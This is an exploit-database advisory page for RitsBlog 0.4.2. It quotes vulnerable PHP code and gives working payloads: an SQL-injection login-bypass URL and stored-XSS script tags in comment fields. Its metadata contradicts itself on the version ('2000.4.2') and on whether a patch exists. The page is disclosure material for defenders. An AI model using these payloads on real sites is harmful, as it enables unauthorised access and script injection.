RitsBlog 0.4.2 SQL Injection and XSS Persistent Vulnerabilities

vendor:

RitsBlog

by:

Salvatore "drosophila" Fresta

8.8

CVSS

HIGH

SQL Injection and XSS Persistent

89, 79

CWE

Product Name: RitsBlog

Affected Version From: 2000.4.2

Affected Version To: 2000.4.2

Patch Exists: YES

Related CWE: N/A

CPE: a:ritsblog:ritsblog:0.4.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

RitsBlog 0.4.2 SQL Injection and XSS Persistent Vulnerabilities

RitsBlog 0.4.2 is vulnerable to SQL Injection and XSS Persistent. The SQL Injection vulnerability is present in the ritsBlogAdmin.class.php file, where the login function does not properly sanitize user-supplied input. An attacker can exploit this vulnerability by sending a crafted request with malicious SQL code. The XSS Persistent vulnerability is present in the ritsBlogAdmin.class.php file, where the addComment function does not properly sanitize user-supplied input. An attacker can exploit this vulnerability by sending a crafted request with malicious JavaScript code.

Mitigation:

It is possible to fix the SQL Injection vulnerability by adding the following line of code in ritsBlogAdmin.class.php: $password = mysql_real_escape_string($password). It is possible to fix the XSS Persistent vulnerability by adding the following line of code in ritsBlogAdmin.class.php: $name = htmlspecialchars($name); $body = htmlspecialchars($body).

Source

Exploit-DB raw data:

*******   Salvatore "drosophila" Fresta   *******

[+] Application: RitsBlog
[+] Version: 0.4.2
[+] Website: http://sourceforge.net/projects/ritsblog/

[+] Bugs: [A] SQL Injection
          [B] XSS Persistent

[+] Exploitation: Remote
[+] Date: 02 Mar 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com


*************************************************

[+] Menu

- [1] Bugs
- [2] Code
- [3] Fix


*************************************************

[+] Bugs

- [A] SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: ritsBlogAdmin.class.php

This blog is entirely vulnerable to SQL Injection.
The following is the vulnerable query that can be
used to bypass authentication.

In jobs.php:

if ($_GET[j] == "login"){
     if ($blog -> login($_GET[p])){
         $_SESSION[loggedin] = "ok";
         $_SESSION[userID] = $blog -> userID;
         echo "Password found. Loging in...";
         ....

In ritsBlogAdmin.class.php:

function login($password){
         global $db;
         $sql = "select * from users where secretWord  = '$password'";
         ...
}


- [B] XSS Persistent

[-] Requisites: none
[-] File affected: ritsBlogAdmin.class.php

In jobs.php:

if ($_POST[j] == "addComment"){
         echo $blog -> addComment($_POST[id], $_POST[name],
$_POST[body]);
}

In ritsBlogAdmin.class.php

function addComment($id, $name, $body){
         global $db;
         $sql = "INSERT INTO comments (name, postID, date, text)
VALUES('" . addslashes($name) . "','" . $id . "',NOW(),'" .
addslashes($body) . "')";
         ...
}


*************************************************

[+] Code

- [A] SQL Injection

http://www.site.com/path/blogAdmin/jobs.php?j=login&p=1'or'1'='1


- [B] XSS Persistent

It is possible using forms in the index.php or
to send over POST method the following values:

?j=addComment&id=54&name=myname&body=<script>alert('XSS');</script>

or

?j=addComment&id=54&name=<script>alert('XSS');</script>&body=body


*************************************************

[+] Fix

No fix.


*************************************************

-- Salvatore "drosophila" Fresta CWNP444351 

# milw0rm.com [2009-03-02]